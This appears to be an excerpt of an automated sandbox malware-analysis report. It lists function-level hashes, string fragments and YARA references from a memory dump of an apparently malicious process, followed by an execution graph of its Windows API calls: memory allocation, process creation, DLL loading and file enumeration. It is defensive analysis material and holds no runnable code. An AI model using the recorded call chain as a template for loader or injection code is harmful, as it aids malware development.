                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: F$P$T$f$r$x
                                  • API String ID: 0-2523166886
                                  • Opcode ID: 5d9d204b7a1df8da1e28459c6a0336e82dbcdf69dd9af6cab1f0cc3060e4283e
                                  • Instruction ID: 2edcdc62d801754bc3a0f942dd2779a48b26dc3e65674cc49a4c18e6f2a120ee
                                  • Opcode Fuzzy Hash: 5d9d204b7a1df8da1e28459c6a0336e82dbcdf69dd9af6cab1f0cc3060e4283e
                                  • Instruction Fuzzy Hash: DB51D671900304ABEB34DBA9CD88BAAF7FCFF51700F04465FE5496A280D7B4A648CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A7023A Relevance: 7.7, Strings: 6, Instructions: 151COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: = $ = $FALSETRUE$FALSETRUE$TRUE$TRUE
                                  • API String ID: 0-407280067
                                  • Opcode ID: 8fae921e8934c83fd2f5844084284dba5bc09fc07e3509a003e0793e21ccedc4
                                  • Instruction ID: 711598e933d10338f09bffac4674105d994b9c522243cc6a9d1345aa507da038
                                  • Opcode Fuzzy Hash: 8fae921e8934c83fd2f5844084284dba5bc09fc07e3509a003e0793e21ccedc4
                                  • Instruction Fuzzy Hash: 4B418575A823587AEB01FBA4CD46FEF777CDF55600F404046F6147E280DAB4660987E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A70F91 Relevance: 7.5, Strings: 6, Instructions: 37COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: F$P$T$f$r$x
                                  • API String ID: 0-2523166886
                                  • Opcode ID: a7ea9d86e8d04bda2051841dd3bf881c4c886284b560cf257ee82d70eed6456f
                                  • Instruction ID: 2184cc33e7bb4a674ec8a00714d7e916faeffe2be5954c6aad2d1da86d44f310
                                  • Opcode Fuzzy Hash: a7ea9d86e8d04bda2051841dd3bf881c4c886284b560cf257ee82d70eed6456f
                                  • Instruction Fuzzy Hash: 85F06271D10258AADB20DFA589086DEBFB9FF41314F40855AA8047F700E7B65609CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A706E8 Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $i$l$o$u
                                  • API String ID: 0-2051669658
                                  • Opcode ID: 12d4a893e268baa8c41f02844b9a0623df5760a2ff7af7b0d99c3a71a0243077
                                  • Instruction ID: e6d1bf33a19b82e46d369b90e9ff9ce34579f204f55b7f0719c620d2d851ae10
                                  • Opcode Fuzzy Hash: 12d4a893e268baa8c41f02844b9a0623df5760a2ff7af7b0d99c3a71a0243077
                                  • Instruction Fuzzy Hash: 586120B6A00308AFDB24DBA4CC84FEFB7FDAF48710F14455DE559A7240E774AA458BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A706E4 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $i$l$o$u
                                  • API String ID: 0-2051669658
                                  • Opcode ID: 280b454d22b9aa316a3ef13d5cc1bfe5000f46330adadc6caa7c57e1f1570738
                                  • Instruction ID: c1552d1fbde920cc39bac15fa0b86d429938a151b559938f91b318a5c2f0cba0
                                  • Opcode Fuzzy Hash: 280b454d22b9aa316a3ef13d5cc1bfe5000f46330adadc6caa7c57e1f1570738
                                  • Instruction Fuzzy Hash: 9741E6B6A00308AFDB60DFA4CC84FEFBBFDAF49700F14455AE559A7240D774AA458B60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A6C7D8 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: -$0$6$J$J
                                  • API String ID: 0-3339242485
                                  • Opcode ID: bca155fe529d64cc13e769285eabc5d9fe639c199f01c4cab6108a04398b48d2
                                  • Instruction ID: 1e84542ccfc2dcd8951e9306c3065f775e376d46544f8d5d8ce5faf8d1038fe0
                                  • Opcode Fuzzy Hash: bca155fe529d64cc13e769285eabc5d9fe639c199f01c4cab6108a04398b48d2
                                  • Instruction Fuzzy Hash: A13124B5D10219BBEF10DBA4DD41FFE77B8EF05304F048199E908AB240E7759A458BE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A5DCE8 Relevance: 6.3, Strings: 5, Instructions: 43COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !$G$e$u$w
                                  • API String ID: 0-2067939
                                  • Opcode ID: d4d47ac5da0a6a8e1b4fe6a13439eec53529d80a469418b6084dc7ab115ef377
                                  • Instruction ID: c70d5051a836f21a2dce6a7af02270c344877d73ffe9c517c077e06ec703d335
                                  • Opcode Fuzzy Hash: d4d47ac5da0a6a8e1b4fe6a13439eec53529d80a469418b6084dc7ab115ef377
                                  • Instruction Fuzzy Hash: 66118E10D0D7CED9DB12CBBC88046AEBF715F23224F0883D9D8F56A2D2D2755616C7A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A70388 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: b087f1bdb85a367de17b9143e453086e14e1186ed443de26efbd779faf4a6268
                                  • Instruction ID: d74bf2eb6d0009f7030ba3ecd00c44927554c62a13647c6d8686dff4f3645581
                                  • Opcode Fuzzy Hash: b087f1bdb85a367de17b9143e453086e14e1186ed443de26efbd779faf4a6268
                                  • Instruction Fuzzy Hash: 24B1E9B5A00708AFDB64DBA4CC84FEFB7FDAF88700F14855DF619AB240D674AA418B50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A70C88 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$h$o
                                  • API String ID: 0-3662636641
                                  • Opcode ID: 3e06f6bf5b05154aa4d6f3f81e32d05f35ccd35101e69136dcb2e649d692a206
                                  • Instruction ID: 69608a340b1ca8d1a5d639e14adf2b748cc9e857d8717e47f345a41cd00a0436
                                  • Opcode Fuzzy Hash: 3e06f6bf5b05154aa4d6f3f81e32d05f35ccd35101e69136dcb2e649d692a206
                                  • Instruction Fuzzy Hash: 287163B69002187EDF60EB94CD85FEF73BCEF45600F40459AF549AA140EE745B898FA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A70382 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: 986523db24db08602ce3da2bd06796a9fd1b4f18ccc9f97c59f35b6012c2e19a
                                  • Instruction ID: 24319adcd44b89aefbace0246074806c65a381ba6c9be19a5b0070fb91f02186
                                  • Opcode Fuzzy Hash: 986523db24db08602ce3da2bd06796a9fd1b4f18ccc9f97c59f35b6012c2e19a
                                  • Instruction Fuzzy Hash: 68611FB5A00708AFDB64DFA4CC84FEFB7BDAF88704F14855DA619AB244D770AA41CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A70248 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                  • API String ID: 0-2877786613
                                  • Opcode ID: e3199ae51573058c4a82bfc901ca1bf7425f641c26fa21deecdc88cc5e780de4
                                  • Instruction ID: cc5e7f08a9261fb94a51c1d0c408bfbf8e8ce4efba99fb42d4a11f639184fd05
                                  • Opcode Fuzzy Hash: e3199ae51573058c4a82bfc901ca1bf7425f641c26fa21deecdc88cc5e780de4
                                  • Instruction Fuzzy Hash: AD3161759823587AEB01FBA4CD41FEFB77C9F55600F40404AF6147E280EBB46A0987E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A70C7C Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$h$o
                                  • API String ID: 0-3662636641
                                  • Opcode ID: 5dcc328bfcc5205093f279fc4dccbd32e4bfb6f4f12dc6a64f322674b21d9d7f
                                  • Instruction ID: 779950f2977bb4048d156398c31b80a0eae51d1a20cba4912cd18c006c00c80d
                                  • Opcode Fuzzy Hash: 5dcc328bfcc5205093f279fc4dccbd32e4bfb6f4f12dc6a64f322674b21d9d7f
                                  • Instruction Fuzzy Hash: 0A412FB5E00318BEDFA0EBA4CD45FEF72B8EF45700F44459AA54DA6140EA745B888F92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A6DC1B Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: 841298dc58ba1b87935b714b96ba7b1bc60fbeac3a3ad3b52e2f0b55b16109fa
                                  • Instruction ID: 5c5b6bf731bf2e9c8c9345c463e34f0a0c962ef538179dc2c07860802e80bfd7
                                  • Opcode Fuzzy Hash: 841298dc58ba1b87935b714b96ba7b1bc60fbeac3a3ad3b52e2f0b55b16109fa
                                  • Instruction Fuzzy Hash: 8211EC72900208EFDB14DFA5D884ADEFBB5FF45314F04825DE5099F205E7719545CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A6DC28 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: 5926333e2b35af22c8b89b14bc847cd3211625cfd9b2f8d605b2656816cc7b4d
                                  • Instruction ID: 25005f22b8f98cbf83d74b20d8edf2bb0ac6c24a0a7c70660ee8550c3e62b45f
                                  • Opcode Fuzzy Hash: 5926333e2b35af22c8b89b14bc847cd3211625cfd9b2f8d605b2656816cc7b4d
                                  • Instruction Fuzzy Hash: 880188B290031CABDB14DF95D884ADEF7B9FF44714F048259E9195F201E7719545CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03A5A568 Relevance: 5.0, Strings: 4, Instructions: 24COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $ma#$$ma#3$3$Ama%$'- 5$ma#3
                                  • API String ID: 0-3979962991
                                  • Opcode ID: 676023505294f6ee252f62c4f33d68d7b2c3320ad8a449cb25ad177d86c099c0
                                  • Instruction ID: 090b521cda1678f23dc396ec7703d1349d8a21227ad22db6123a0ec29ca8f672
                                  • Opcode Fuzzy Hash: 676023505294f6ee252f62c4f33d68d7b2c3320ad8a449cb25ad177d86c099c0
                                  • Instruction Fuzzy Hash: 60F065B4D0120C5ADB05DFA4D984AEEBBB8FF04200F504598DD486F241E3748744CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:3.3%
                                  Dynamic/Decrypted Code Coverage:3.9%
                                  Signature Coverage:2%
                                  Total number of Nodes:510
                                  Total number of Limit Nodes:75
                                  execution_graph 80723 3922ad0 LdrInitializeThunk 80724 2f450b0 80725 2f450c1 80724->80725 80730 2f56ff0 80725->80730 80729 2f450fb 80731 2f5700d 80730->80731 80739 3922c0a 80731->80739 80732 2f450e6 80734 2f57a00 80732->80734 80735 2f57a87 80734->80735 80737 2f57a27 80734->80737 80742 3922e80 LdrInitializeThunk 80735->80742 80736 2f57ab8 80736->80729 80737->80729 80740 3922c11 80739->80740 80741 3922c1f LdrInitializeThunk 80739->80741 80740->80732 80741->80732 80742->80736 80743 2f4f170 80744 2f4f18d 80743->80744 80749 2f43d70 80744->80749 80746 2f4f1ab 80748 2f4f32a 80746->80748 80754 2f556e0 80746->80754 80751 2f43d94 80749->80751 80750 2f43d9b 80750->80746 80751->80750 80752 2f43de7 80751->80752 80753 2f43dd0 LdrLoadDll 80751->80753 80752->80746 80753->80752 80755 2f5573d 80754->80755 80756 2f55770 80755->80756 80759 2f4f44d RtlFreeHeap 80755->80759 80756->80748 80758 2f55752 80758->80748 80759->80758 80770 2f50770 80771 2f5078c 80770->80771 80772 2f507b4 80771->80772 80773 2f507c8 80771->80773 80774 2f57970 NtClose 80772->80774 80780 2f57970 80773->80780 80776 2f507bd 80774->80776 80777 2f507d1 80783 2f59980 RtlAllocateHeap 80777->80783 80779 2f507dc 80781 2f5798d 80780->80781 80782 2f5799e NtClose 80781->80782 80782->80777 80783->80779 80784 2f393e0 80786 2f3973e 80784->80786 80787 2f39b3f 80786->80787 80788 2f594f0 80786->80788 80789 2f59516 80788->80789 80794 2f33dc0 80789->80794 80791 2f59522 80792 2f59550 80791->80792 80797 2f53f90 80791->80797 80792->80787 80801 2f42aa0 80794->80801 80796 2f33dcd 80796->80791 80798 2f53fea 80797->80798 80800 2f53ff7 80798->80800 80818 2f40f50 80798->80818 80800->80792 80802 2f42ab7 80801->80802 80804 2f42ad0 80802->80804 80805 2f583c0 80802->80805 80804->80796 80807 2f583d8 80805->80807 80806 2f583fc 80806->80804 80807->80806 80808 2f56ff0 LdrInitializeThunk 80807->80808 80809 2f58451 80808->80809 80812 2f59860 80809->80812 80815 2f57cd0 80812->80815 80814 2f5846a 80814->80804 80816 2f57cea 80815->80816 80817 2f57cfb RtlFreeHeap 80816->80817 80817->80814 80819 2f40f8b 80818->80819 80834 2f47200 80819->80834 80821 2f40f93 80832 2f41257 80821->80832 80845 2f59940 80821->80845 80823 2f40fa9 80824 2f59940 RtlAllocateHeap 80823->80824 80825 2f40fba 80824->80825 80826 2f59940 RtlAllocateHeap 80825->80826 80827 2f40fc7 80826->80827 80833 2f4105a 80827->80833 80848 2f45ff0 80827->80848 80829 2f43d70 LdrLoadDll 80830 2f41214 80829->80830 80871 2f566b0 80830->80871 80832->80800 80833->80829 80835 2f4722c 80834->80835 80875 2f470f0 80835->80875 80838 2f47271 80840 2f4728d 80838->80840 80843 2f57970 NtClose 80838->80843 80839 2f47259 80841 2f57970 NtClose 80839->80841 80842 2f47264 80839->80842 80840->80821 80841->80842 80842->80821 80844 2f47283 80843->80844 80844->80821 80886 2f57c80 80845->80886 80847 2f5995b 80847->80823 80849 2f46015 80848->80849 80852 2f46049 80849->80852 80904 2f45890 80849->80904 80851 2f46166 80851->80833 80852->80851 80889 2f45b20 80852->80889 80854 2f460df 80855 2f460ea 80854->80855 80911 2f459a0 80854->80911 80855->80833 80858 2f46252 80860 2f45b20 3 API calls 80858->80860 80859 2f57970 NtClose 80865 2f461b2 80859->80865 80861 2f46268 80860->80861 80864 2f4626f 80861->80864 80915 2f45cf0 80861->80915 80863 2f462ac 80863->80833 80864->80833 80866 2f459a0 LdrInitializeThunk 80865->80866 80867 2f461fd 80866->80867 80868 2f57970 NtClose 80867->80868 80869 2f46207 80868->80869 80870 2f459a0 LdrInitializeThunk 80869->80870 80870->80858 80872 2f5670a 80871->80872 80874 2f56717 80872->80874 80965 2f41270 80872->80965 80874->80832 80876 2f4710a 80875->80876 80880 2f471e6 80875->80880 80881 2f57090 80876->80881 80879 2f57970 NtClose 80879->80880 80880->80838 80880->80839 80882 2f570aa 80881->80882 80885 39235c0 LdrInitializeThunk 80882->80885 80883 2f471da 80883->80879 80885->80883 80887 2f57c9d 80886->80887 80888 2f57cae RtlAllocateHeap 80887->80888 80888->80847 80890 2f45b4c 80889->80890 80891 2f459a0 LdrInitializeThunk 80890->80891 80892 2f45b96 80891->80892 80893 2f45c38 80892->80893 80941 2f57450 80892->80941 80893->80854 80895 2f45c2f 80896 2f57970 NtClose 80895->80896 80896->80893 80897 2f45bbd 80897->80895 80898 2f57450 LdrInitializeThunk 80897->80898 80899 2f45c44 80897->80899 80898->80897 80900 2f57970 NtClose 80899->80900 80901 2f45c4d 80900->80901 80902 2f459a0 LdrInitializeThunk 80901->80902 80903 2f45c6a 80901->80903 80902->80903 80903->80854 80905 2f458c3 80904->80905 80906 2f458e7 80905->80906 80946 2f574f0 80905->80946 80906->80852 80908 2f4590a 80908->80906 80909 2f57970 NtClose 80908->80909 80910 2f4598c 80909->80910 80910->80852 80912 2f459c5 80911->80912 80951 2f572f0 80912->80951 80916 2f45d15 80915->80916 80917 2f45890 2 API calls 80916->80917 80918 2f45d45 80916->80918 80917->80918 80919 2f459a0 LdrInitializeThunk 80918->80919 80926 2f45f48 80918->80926 80928 2f45fe1 80918->80928 80921 2f45e71 80919->80921 80920 2f459a0 LdrInitializeThunk 80922 2f45f96 80920->80922 80923 2f45e7c 80921->80923 80921->80926 80956 2f45a50 80922->80956 80925 2f57970 NtClose 80923->80925 80930 2f45e86 80925->80930 80926->80920 80927 2f57970 NtClose 80927->80928 80928->80863 80929 2f45fa6 80929->80927 80931 2f459a0 LdrInitializeThunk 80930->80931 80932 2f45ed1 80931->80932 80933 2f57970 NtClose 80932->80933 80934 2f45edb 80933->80934 80935 2f459a0 LdrInitializeThunk 80934->80935 80936 2f45f26 80935->80936 80937 2f45a50 LdrInitializeThunk 80936->80937 80938 2f45f36 80937->80938 80939 2f57970 NtClose 80938->80939 80940 2f45f40 80939->80940 80940->80863 80942 2f5746a 80941->80942 80945 3922ba0 LdrInitializeThunk 80942->80945 80943 2f5749a 80943->80897 80945->80943 80947 2f5750a 80946->80947 80950 3922ca0 LdrInitializeThunk 80947->80950 80948 2f57536 80948->80908 80950->80948 80952 2f5730d 80951->80952 80955 3922c60 LdrInitializeThunk 80952->80955 80953 2f45a39 80953->80858 80953->80859 80955->80953 80957 2f45a76 80956->80957 80960 2f57350 80957->80960 80961 2f5736d 80960->80961 80964 3923090 LdrInitializeThunk 80961->80964 80962 2f45b04 80962->80929 80964->80962 80981 2f474d0 80965->80981 80967 2f41775 80967->80874 80968 2f41290 80968->80967 80985 2f50130 80968->80985 80971 2f41491 80994 2f5aa70 80971->80994 80973 2f412ee 80973->80967 80989 2f5a940 80973->80989 80975 2f414d1 80975->80967 80978 2f3ff10 LdrInitializeThunk 80975->80978 81004 2f47470 80975->81004 80976 2f414a6 80976->80975 81000 2f3ff10 80976->81000 80978->80975 80979 2f415ff 80979->80975 80980 2f47470 LdrInitializeThunk 80979->80980 80980->80979 80982 2f474dd 80981->80982 80983 2f47505 80982->80983 80984 2f474fe SetErrorMode 80982->80984 80983->80968 80984->80983 80986 2f50149 80985->80986 81008 2f597d0 80986->81008 80988 2f50151 80988->80973 80990 2f5a956 80989->80990 80991 2f5a950 80989->80991 80992 2f59940 RtlAllocateHeap 80990->80992 80991->80971 80993 2f5a97c 80992->80993 80993->80971 80995 2f5a9e0 80994->80995 80996 2f5aa3d 80995->80996 80997 2f59940 RtlAllocateHeap 80995->80997 80996->80976 80998 2f5aa1a 80997->80998 80999 2f59860 RtlFreeHeap 80998->80999 80999->80996 81001 2f3ff2c 81000->81001 81015 2f57be0 81001->81015 81005 2f47483 81004->81005 81020 2f56f00 81005->81020 81007 2f474ae 81007->80975 81011 2f57ac0 81008->81011 81010 2f59801 81010->80988 81012 2f57b4a 81011->81012 81014 2f57ae4 81011->81014 81013 2f57b60 NtAllocateVirtualMemory 81012->81013 81013->81010 81014->81010 81016 2f57bfd 81015->81016 81019 3922c70 LdrInitializeThunk 81016->81019 81017 2f3ff32 81017->80979 81019->81017 81021 2f56f73 81020->81021 81022 2f56f24 81020->81022 81025 3922dd0 LdrInitializeThunk 81021->81025 81022->81007 81023 2f56f98 81023->81007 81025->81023 81026 2f468e0 81027 2f468f8 81026->81027 81029 2f46952 81026->81029 81027->81029 81030 2f4a510 81027->81030 81031 2f4a536 81030->81031 81032 2f4a755 81031->81032 81057 2f57d60 81031->81057 81032->81029 81034 2f4a5ac 81034->81032 81035 2f5aa70 2 API calls 81034->81035 81036 2f4a5c8 81035->81036 81036->81032 81037 2f4a699 81036->81037 81038 2f56ff0 LdrInitializeThunk 81036->81038 81039 2f44fa0 LdrInitializeThunk 81037->81039 81041 2f4a6b8 81037->81041 81040 2f4a624 81038->81040 81039->81041 81040->81037 81045 2f4a62d 81040->81045 81056 2f4a73d 81041->81056 81066 2f56bc0 81041->81066 81042 2f4a681 81043 2f47470 LdrInitializeThunk 81042->81043 81049 2f4a68f 81043->81049 81044 2f4a65f 81063 2f53190 81044->81063 81045->81032 81045->81042 81045->81044 81060 2f44fa0 81045->81060 81049->81029 81050 2f47470 LdrInitializeThunk 81052 2f4a74b 81050->81052 81051 2f4a714 81071 2f56c60 81051->81071 81052->81029 81054 2f4a72e 81076 2f56da0 81054->81076 81056->81050 81058 2f57d7a 81057->81058 81059 2f57d8b CreateProcessInternalW 81058->81059 81059->81034 81081 2f571c0 81060->81081 81062 2f44fde 81062->81044 81064 2f47470 LdrInitializeThunk 81063->81064 81065 2f531c2 81064->81065 81065->81042 81067 2f56c32 81066->81067 81069 2f56be4 81066->81069 81087 39239b0 LdrInitializeThunk 81067->81087 81068 2f56c57 81068->81051 81069->81051 81072 2f56c84 81071->81072 81073 2f56cd2 81071->81073 81072->81054 81088 3924340 LdrInitializeThunk 81073->81088 81074 2f56cf7 81074->81054 81077 2f56e12 81076->81077 81078 2f56dc4 81076->81078 81089 3922fb0 LdrInitializeThunk 81077->81089 81078->81056 81079 2f56e37 81079->81056 81082 2f57265 81081->81082 81084 2f571e7 81081->81084 81086 3922d10 LdrInitializeThunk 81082->81086 81083 2f572aa 81083->81062 81084->81062 81086->81083 81087->81068 81088->81074 81089->81079 81090 2f45020 81091 2f47470 LdrInitializeThunk 81090->81091 81092 2f45050 81091->81092 81094 2f4507c 81092->81094 81095 2f473f0 81092->81095 81096 2f47434 81095->81096 81097 2f47455 81096->81097 81102 2f56d00 81096->81102 81097->81092 81099 2f47445 81100 2f47461 81099->81100 81101 2f57970 NtClose 81099->81101 81100->81092 81101->81097 81103 2f56d75 81102->81103 81105 2f56d27 81102->81105 81107 3924650 LdrInitializeThunk 81103->81107 81104 2f56d9a 81104->81099 81105->81099 81107->81104 81108 2f4b7a0 81110 2f4b7c9 81108->81110 81109 2f4b8cd 81110->81109 81111 2f4b873 FindFirstFileW 81110->81111 81111->81109 81113 2f4b88e 81111->81113 81112 2f4b8b4 FindNextFileW 81112->81113 81114 2f4b8c6 FindClose 81112->81114 81113->81112 81114->81109 81115 2f542e0 81116 2f5433d 81115->81116 81117 2f54374 81116->81117 81120 2f501a0 81116->81120 81119 2f54356 81121 2f501ae 81120->81121 81122 2f50149 81120->81122 81123 2f597d0 NtAllocateVirtualMemory 81122->81123 81124 2f50151 81123->81124 81124->81119 81125 2f577e0 81126 2f5787f 81125->81126 81128 2f57807 81125->81128 81127 2f57895 NtReadFile 81126->81127 81129 2f56fa0 81130 2f56fbd 81129->81130 81133 3922df0 LdrInitializeThunk 81130->81133 81131 2f56fe5 81133->81131 81134 2f5a9a0 81135 2f59860 RtlFreeHeap 81134->81135 81136 2f5a9b5 81135->81136 81137 2f47b22 81138 2f47ab9 81137->81138 81138->81137 81140 2f47abe 81138->81140 81141 2f46560 LdrInitializeThunk LdrInitializeThunk 81138->81141 81141->81138 81142 2f4512f 81143 2f450e7 81142->81143 81143->81142 81144 2f57a00 LdrInitializeThunk 81143->81144 81145 2f450fb 81143->81145 81144->81145 81147 2f3ad50 81148 2f597d0 NtAllocateVirtualMemory 81147->81148 81149 2f3c3c1 81148->81149 81150 2f4e890 81151 2f4e8f4 81150->81151 81152 2f45890 2 API calls 81151->81152 81154 2f4ea1d 81152->81154 81153 2f4ea24 81154->81153 81155 2f459a0 LdrInitializeThunk 81154->81155 81156 2f4eaa0 81155->81156 81157 2f556e0 RtlFreeHeap 81156->81157 81179 2f4ebc3 81156->81179 81158 2f4eabd 81157->81158 81159 2f4ebd2 81158->81159 81181 2f4e670 81158->81181 81160 2f57970 NtClose 81159->81160 81163 2f4ebdc 81160->81163 81162 2f4ead5 81162->81159 81164 2f4eae0 81162->81164 81165 2f59940 RtlAllocateHeap 81164->81165 81166 2f4eb09 81165->81166 81167 2f4eb12 81166->81167 81168 2f4eb28 81166->81168 81169 2f57970 NtClose 81167->81169 81190 2f4e560 CoInitialize 81168->81190 81171 2f4eb1c 81169->81171 81172 2f4eb36 81173 2f57450 LdrInitializeThunk 81172->81173 81177 2f4eb54 81173->81177 81174 2f4ebb2 81175 2f57970 NtClose 81174->81175 81176 2f4ebbc 81175->81176 81178 2f59860 RtlFreeHeap 81176->81178 81177->81174 81180 2f57450 LdrInitializeThunk 81177->81180 81178->81179 81180->81177 81182 2f4e68c 81181->81182 81183 2f43d70 LdrLoadDll 81182->81183 81185 2f4e6aa 81183->81185 81184 2f4e6b3 81184->81162 81185->81184 81186 2f43d70 LdrLoadDll 81185->81186 81187 2f4e77e 81186->81187 81188 2f43d70 LdrLoadDll 81187->81188 81189 2f4e7db 81187->81189 